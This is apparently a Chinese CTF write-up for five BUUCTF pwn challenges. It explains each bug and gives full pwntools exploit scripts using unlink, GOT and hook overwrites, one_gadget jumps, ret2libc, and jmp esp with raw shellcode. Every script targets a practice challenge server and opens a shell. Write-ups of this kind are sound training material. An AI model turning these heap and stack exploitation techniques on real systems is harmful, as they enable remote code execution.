buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc

文章目录

    • zctf2016_note2
    • oneshot_tjctf_2016
    • ciscn_2019_en_3
    • x_ctf_b0verfl0w
    • [GKCTF2020]Domo

zctf2016_note2

本题的漏洞在这里
buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc_第1张图片
有符号数和无符号数进行了比较，比较时被转换成无符号数。我们把 size 设为 0，那么 -1 转换成无符号数后就永远大于 i，就可以溢出了。

本题可以改 GOT 表，heap_ptr 的地址也可以找到，那就用 unlink。
buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc_第2张图片
改成这样就行，利用 chunk1 的溢出。
然后把 atoi 改成 system，输入 sh 就行了。
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './note2'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'

# Target selection: 0 runs the binary locally under pwntools, anything else
# connects to the challenge server.  Both paths load the same libc build,
# which is what the symbol offsets below are taken from.
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29525)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch


# Short aliases around the tube `r`, written as functions rather than lambdas.
def se(data):
    return r.send(data)

def sa(delim, data):
    return r.sendafter(delim, data)

def sl(data):
    return r.sendline(data)

def sla(delim, data):
    return r.sendlineafter(delim, data)

def sea(delim, data):          # identical to sa(); kept because callers use both names
    return r.sendafter(delim, data)

def rc(numb=4096):
    return r.recv(numb)

def rl():
    return r.recvline()

def ru(delims):
    return r.recvuntil(delims)

def uu32(data):
    """Unpack at most 4 bytes as a u32, zero-padding on the right."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Unpack at most 8 bytes as a u64, zero-padding on the right."""
    return u64(data.ljust(8, '\0'))

def info(tag, addr):
    """Log `tag: 0x...` through the tube's logger."""
    return r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live tube `r`; `cmd` is passed through as the gdb script."""
    gdb.attach(r, cmd)

def menu(choice):
    """Wait for the menu prompt and send `choice` as its decimal text."""
    text = str(choice)
    sla('option--->>', text)
def add(size, content):
    """Menu 1: create a note of `size` bytes holding `content`."""
    menu(1)
    length_prompt = 'Input the length of the note content:(less than 128)\n'
    sla(length_prompt, str(size))
    sla('Input the note content:\n', content)
def show(index):
    """Menu 2: print the note stored at `index`."""
    menu(2)
    idx = str(index)
    sla('Input the id of the note:\n', idx)
def edit(index, content):
    """Menu 3: replace the contents of note `index` with `content`.

    The ']' prompt is answered with '1'; presumably that selects the
    overwrite mode rather than append -- confirm against the binary.
    """
    menu(3)
    idx = str(index)
    sla('note:\n', idx)
    sla(']\n', '1')
    sla('TheNewContents:', content)
def free(index):
    """Menu 4: delete the note stored at `index`."""
    menu(4)
    idx = str(index)
    sla('note:\n', idx)
# Answer the two prompts the program shows before its menu.
sla('\n', 'aa')
sla('\n', 'bb')
#--------------------------------------------------------------------------------------------------------
# Slot the unlink is aimed at (presumably the note-pointer array the prose
# calls heap_ptr; the value comes from the binary -- confirm).  The 0x18
# filler used in edit() below matches this layout.
target = 0x602120

# Fake chunk in note 0: 8 filler bytes, a size field of 0x61, then fd/bk
# pointing 0x18 and 0x10 below `target`, the shape the unlink step needs.
p = 'a'*8 + p64(0x61) + p64(target-0x18) + p64(target-0x10)
add(0x40, p)
# size 0: the signed/unsigned comparison described above makes the limit
# -1 as unsigned, so writes into this note are effectively unbounded.
add(0, '')
add(0x80, 'bbbb')

# Re-create note 1 with the unbounded write and overwrite the header of
# the following chunk (prev_size 0x60, size 0x90), as in the second figure.
free(1)
p2 = 'b'*0x10 + p64(0x60) + p64(0x90)
add(0, p2)
# Freeing chunk 2 now triggers the unlink on the fake chunk, which rewrites
# the slot at `target`.
free(2)

# After unlink the slot at `target` points 0x18 bytes below itself, so
# editing note 0 with 0x18 filler bytes followed by atoi@got makes the slot
# itself point at atoi@got; show() then leaks atoi's libc address.
edit(0, 'a'*0x18 + p64(elf.got['atoi']))
show(0)
# Last 6 bytes up to the 0x7f high byte are the little-endian pointer.
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['atoi']
system = libc_base + libc.sym['system']
info('libc_base', libc_base)

# Overwrite atoi@got with system; the menu's atoi() on the next input then
# runs system("/bin/sh").
edit(0, p64(system))
sl('/bin/sh\x00')

r.interactive()

oneshot_tjctf_2016

shot
可以读一次和跳转一次，那就先用读取泄漏 libc，再跳转到 og。
buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc_第3张图片

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './oneshot_tjctf_2016'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'

# Target selection: 0 runs the binary locally under pwntools, anything else
# connects to the challenge server.  Both paths load the same libc build,
# which is what the symbol offsets below are taken from.
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29219)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch


# Short aliases around the tube `r`, written as functions rather than lambdas.
def se(data):
    return r.send(data)

def sa(delim, data):
    return r.sendafter(delim, data)

def sl(data):
    return r.sendline(data)

def sla(delim, data):
    return r.sendlineafter(delim, data)

def sea(delim, data):          # identical to sa(); kept because callers use both names
    return r.sendafter(delim, data)

def rc(numb=4096):
    return r.recv(numb)

def rl():
    return r.recvline()

def ru(delims):
    return r.recvuntil(delims)

def uu32(data):
    """Unpack at most 4 bytes as a u32, zero-padding on the right."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Unpack at most 8 bytes as a u64, zero-padding on the right."""
    return u64(data.ljust(8, '\0'))

def info(tag, addr):
    """Log `tag: 0x...` through the tube's logger."""
    return r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live tube `r`; `cmd` is passed through as the gdb script."""
    gdb.attach(r, cmd)

# The program reads one address and later jumps to one (see the prose).
# Send puts@got as decimal text -- the program parses a number, not bytes.
p = str(elf.got['puts'])
sl(p)
# It prints the value at that address as "0x" + 16 hex digits; parse it
# with int(..., 16) to recover puts' libc address.
ru('0x')
libc_base = int(rc(16), 16) - libc.sym['puts']
info('libc_base', libc_base)
# libc offsets listed in the write-up for this libc build; the first is used.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
og = libc_base + o_g[0]
# Second input is the jump target, again as decimal text.
sl(str(og))
r.interactive()

记得发送地址时用 str 转成字符串，读取泄漏时用 int 解析。

ciscn_2019_en_3

有点生气。
这题有个 _printf_chk 可以泄漏 libc。
glibc 2.27（18）下的 UAF：对同一个索引 free 3 次，然后 add，然后改 free_hook。
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './ciscn_2019_en_3'
local_libc  = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'

# Target selection: 0 runs the binary locally under pwntools, anything else
# connects to the challenge server.  Both paths load the same libc build,
# which is what the symbol offsets below are taken from.
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 27414)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch


# Short aliases around the tube `r`, written as functions rather than lambdas.
def se(data):
    return r.send(data)

def sa(delim, data):
    return r.sendafter(delim, data)

def sl(data):
    return r.sendline(data)

def sla(delim, data):
    return r.sendlineafter(delim, data)

def sea(delim, data):          # identical to sa(); kept because callers use both names
    return r.sendafter(delim, data)

def rc(numb=4096):
    return r.recv(numb)

def rl():
    return r.recvline()

def ru(delims):
    return r.recvuntil(delims)

def uu32(data):
    """Unpack at most 4 bytes as a u32, zero-padding on the right."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Unpack at most 8 bytes as a u64, zero-padding on the right."""
    return u64(data.ljust(8, '\0'))

def info(tag, addr):
    """Log `tag: 0x...` through the tube's logger."""
    return r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live tube `r`; `cmd` is passed through as the gdb script."""
    gdb.attach(r, cmd)
def menu(choice):
    """Wait for the menu prompt and send `choice` as its decimal text."""
    text = str(choice)
    sla('choice:', text)
def add(size, content):
    """Menu 1: add a story of `size` bytes; `content` is sent raw (no newline)."""
    menu(1)
    sla('size of story: \n', str(size))
    sea('story: \n', content)
def free(index):
    """Menu 4: delete the story at `index`."""
    menu(4)
    idx = str(index)
    sla('index:\n', idx)
# Leak through the format-string path the prose attributes to _printf_chk:
# the output shows "0x20" followed by a second "0x..." pointer.  That pointer
# is 17 bytes past libc's read() on this build (the write-up's constant).
sl('%p%p%p')
ru('0x200x')
libc_base = int(rc(12), 16) - libc.sym['read'] - 17
info('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
info('free_hook', free_hook)
# libc offsets listed in the write-up for this build; index 1 is used.
o_g = [0x4f2c5, 0x4f322, 0x10a38c]
og = libc_base + o_g[1]
# Answer the remaining prompt before the menu.
sl('b')
#--------------------------------------------------------------------------------------------------------
# UAF from the prose: free the same 0x18-byte story three times (glibc 2.27),
# then the following add()s hand back that chunk; the first write plants
# free_hook so the third add() is served from __free_hook and stores og there.
add(0x18, 'aa')
free(0)
free(0)
free(0)
add(0x18, p64(free_hook))
add(0x18, 'aa')
add(0x18, p64(og))
# Menu 4 (delete) on index 1: the free() call now goes through the hook.
sl('4')
sl('1')

r.interactive()



x_ctf_b0verfl0w

这题没有防护，ret2libc（r2libc）和 jmp esp 两种方法都可以。
r2libc
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './b0verfl0w'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'

# Target selection: 0 runs the binary locally under pwntools, anything else
# connects to the challenge server.  No libc ELF is loaded here: the remote
# libc is identified later from a leaked address (LibcSearcher).
select = 1

if select == 0:
    r = process(local_file)
else:
    r = remote('node3.buuoj.cn', 26414)

elf = ELF(local_file)

context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch


# Short aliases around the tube `r`, written as functions rather than lambdas.
def se(data):
    return r.send(data)

def sa(delim, data):
    return r.sendafter(delim, data)

def sl(data):
    return r.sendline(data)

def sla(delim, data):
    return r.sendlineafter(delim, data)

def sea(delim, data):          # identical to sa(); kept because callers use both names
    return r.sendafter(delim, data)

def rc(numb=4096):
    return r.recv(numb)

def rl():
    return r.recvline()

def ru(delims):
    return r.recvuntil(delims)

def uu32(data):
    """Unpack at most 4 bytes as a u32, zero-padding on the right."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Unpack at most 8 bytes as a u64, zero-padding on the right."""
    return u64(data.ljust(8, '\0'))

def info(tag, addr):
    """Log `tag: 0x...` through the tube's logger."""
    return r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live tube `r`; `cmd` is passed through as the gdb script."""
    gdb.attach(r, cmd)

fun_got = elf.got['puts']
fun_plt = elf.plt['puts']
main = elf.sym['main']

# 32-bit stack overflow, no protections (prose).  0x20 bytes fill the buffer,
# 4 bytes presumably cover the saved ebp, then the return address becomes
# puts@plt with main as puts' return address and puts@got as its argument:
# the leak prints puts' libc address and the program restarts at main.
p1 = flat(['a'*0x20, 'b'*4, fun_plt, main, fun_got])
sl(p1)
#log.info(rl())
# The leaked address has high byte 0xf7; little-endian, so it is the last
# byte received and the 4 bytes ending there are the pointer.
fun_addr = uu32(ru('\xf7')[-4:])
#fun_addr = uu32(rc(4))
info('fun_addr', fun_addr)

# Identify the remote libc from the leaked puts address and derive offsets.
libc = LibcSearcher('puts', fun_addr)
libcbase = fun_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

# Second pass through main: return into system with "/bin/sh" as argument;
# the middle 'b'*4 is system's (never used) return address.
p2 = flat(['a'*0x20, 'b'*4, system_addr, 'b'*4, binsh_addr])
sl(p2)



r.interactive()

jmpesp
ROPgadget --binary x_ctf_b0verfl0w --only 'jmp|ret'
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './b0verfl0w'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'

# Target selection: 0 runs the binary locally under pwntools, anything else
# connects to the challenge server.  No libc ELF is loaded: this variant
# does not use libc at all.
select = 1

if select == 0:
    r = process(local_file)
else:
    r = remote('node3.buuoj.cn', 26414)

elf = ELF(local_file)

context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch       # also selects the asm() target below


# Short aliases around the tube `r`, written as functions rather than lambdas.
def se(data):
    return r.send(data)

def sa(delim, data):
    return r.sendafter(delim, data)

def sl(data):
    return r.sendline(data)

def sla(delim, data):
    return r.sendlineafter(delim, data)

def sea(delim, data):          # identical to sa(); kept because callers use both names
    return r.sendafter(delim, data)

def rc(numb=4096):
    return r.recv(numb)

def rl():
    return r.recvline()

def ru(delims):
    return r.recvuntil(delims)

def uu32(data):
    """Unpack at most 4 bytes as a u32, zero-padding on the right."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Unpack at most 8 bytes as a u64, zero-padding on the right."""
    return u64(data.ljust(8, '\0'))

def info(tag, addr):
    """Log `tag: 0x...` through the tube's logger."""
    return r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live tube `r`; `cmd` is passed through as the gdb script."""
    gdb.attach(r, cmd)

# Address of a `jmp esp` gadget inside the binary (found with the ROPgadget
# command above; the binary is not PIE per the prose).
jmp_esp = 0x08048504 # jmp esp
# Hand-written 18-byte shellcode; the prose notes pwntools' stock shellcode
# is too long for this buffer.
sh= "\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

print len(sh)
# Pad the shellcode to 0x24 bytes (up to the saved return address), replace
# the return address with the gadget, and append a stub that moves esp
# back 0x28 bytes -- the start of this buffer -- and jumps there.
p = sh.ljust(0x24, '\x00')
p += p32(jmp_esp) + asm('sub esp, 0x28; jmp esp')
sl(p)
r.interactive()

记得用自己写的 shellcode，自带的太长了。

[GKCTF2020]Domo

scanf 的输入长度过长时会在内部触发 malloc。
https://www.xuenixiang.com/thread-2351-1-1.html
https://blog.play2win.top/2020/05/27/GKCTF%202020%20Domo%E5%88%86%E6%9E%90/
https://blog.csdn.net/weixin_44145820/article/details/106310483
http://www.pwn4fun.com/pwn/gkctf-2020-partwp.html#Demo
漏洞是 off-by-null。

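# Heap layout used by the exploit below (indices in the trailing comments).
# The quote characters were typographic quotes in the original and did not
# parse as Python; they are plain ASCII quotes here.
add(0x80, 'aa')#0
add(0x10, 'aa')#1
add(0x68, 'aa')#2
add(0xf0, 'aa')#3
add(0x80, 'aa')#4
#------------------------------------------------------------------------------------------------------------------------------------
# Refill chunk 2 with 0x60 filler bytes plus the 8-byte value 0x120: the
# 0x68-byte write puts 0x120 into chunk 3's prev_size, and the terminating
# null byte (the off-by-null bug) clears the low byte of chunk 3's size.
p = 'a'*0x60+p64(0x120)
free(2)
add(0x68, p)
#------------------------------------------------------------------------------------------------------------------------------------
# Free 2 and 0 first, then 3: chunk 3's forged prev_size now points back
# over chunks 0..2, so the frees consolidate into one large chunk.
free(2)
free(0)
free(3)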

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './domo'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = '/lib/x86_64-linux-gnu/libc-2.23.so'

# Target selection: 0 runs the binary locally under pwntools, anything else
# connects to the challenge server.  Both paths load the same libc build,
# which is what the symbol offsets below are taken from.
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 27766)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch


# Short aliases around the tube `r`, written as functions rather than lambdas.
def se(data):
    return r.send(data)

def sa(delim, data):
    return r.sendafter(delim, data)

def sl(data):
    return r.sendline(data)

def sla(delim, data):
    return r.sendlineafter(delim, data)

def sea(delim, data):          # identical to sa(); kept because callers use both names
    return r.sendafter(delim, data)

def rc(numb=4096):
    return r.recv(numb)

def rl():
    return r.recvline()

def ru(delims):
    return r.recvuntil(delims)

def uu32(data):
    """Unpack at most 4 bytes as a u32, zero-padding on the right."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Unpack at most 8 bytes as a u64, zero-padding on the right."""
    return u64(data.ljust(8, '\0'))

def info(tag, addr):
    """Log `tag: 0x...` through the tube's logger."""
    return r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live tube `r`; `cmd` is passed through as the gdb script."""
    gdb.attach(r, cmd)

def menu(choice):
    """Wait for the '> ' prompt and send `choice` as its decimal text."""
    text = str(choice)
    sla('> ', text)
def add(size, content):
    """Menu 1: allocate `size` bytes and fill them with `content` (sent raw)."""
    menu(1)
    sla('size:\n', str(size))
    sea('content:\n', content)
def free(index):
    """Menu 2: free the chunk at `index`."""
    menu(2)
    idx = str(index)
    sla('index:\n', idx)
def show(index):
    """Menu 3: print the chunk at `index`."""
    menu(3)
    idx = str(index)
    sla('index:\n', idx)
def edit(addr, content):
    """Menu 4: send `addr` as text, then `content` raw at the 'num:' prompt.

    Not used by the exploit body below; kept for completeness.
    """
    menu(4)
    sla('addr:\n', str(addr))
    sea('num:\n', content)
# Leak (glibc 2.23): free the 0x80 chunk, take it back and write a single
# byte so that only the low byte of the leftover libc pointer changes
# (presumably; confirm), then show() prints a libc address.  The write-up's
# constants 192 and 0x10 convert that value to __malloc_hook.
add(0x80, 'aa')
add(0x10, 'aa')
free(0)
add(0x80, '\xe0')
show(0)
libc_base = uu64(ru('\x7f')[-6:]) - 192 - 0x10 - libc.sym['__malloc_hook']
info('libc_base', libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
# libc offsets listed in the write-up for this build; index 3 is used.
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
og = libc_base + o_g[3]
# Same layout as the snippet above: chunk 2's 0x68-byte refill puts 0x120
# into chunk 3's prev_size and the off-by-null clears its size's low byte,
# so freeing 3 consolidates back over chunks 0..2.
add(0x68, 'aa')#2
add(0xf0, 'aa')#3
add(0x80, 'aa')#4
p = 'a'*0x60+p64(0x120)
free(2)
add(0x68, p)
free(2)
free(0)
free(3)

# Carve the consolidated chunk: 0x80 bytes for the old chunk 0, then chunk
# 1's header (0x21) and data, then chunk 2's header (0x71) and its fd.
# Chunk 2 is still in the fastbin from free(2), so its fd now reads
# malloc_hook-0x23.
p = 'a'*0x80+p64(0)+p64(0x21)+'a'*0x10+p64(0)+p64(0x71)+p64(malloc_hook-0x23)
add(len(p), p)
# First 0x68 request returns chunk 2; the second returns malloc_hook-0x23,
# and 0x13 filler + 0x10 header = 0x23 puts og exactly on __malloc_hook.
add(0x68, 'aa')
add(0x68, 'a'*0x13+p64(og))
# An over-long scanf input makes libc allocate internally (prose), which
# now goes through the overwritten hook.
sl('2'*2012)
#debug()
sl('1')
r.interactive()
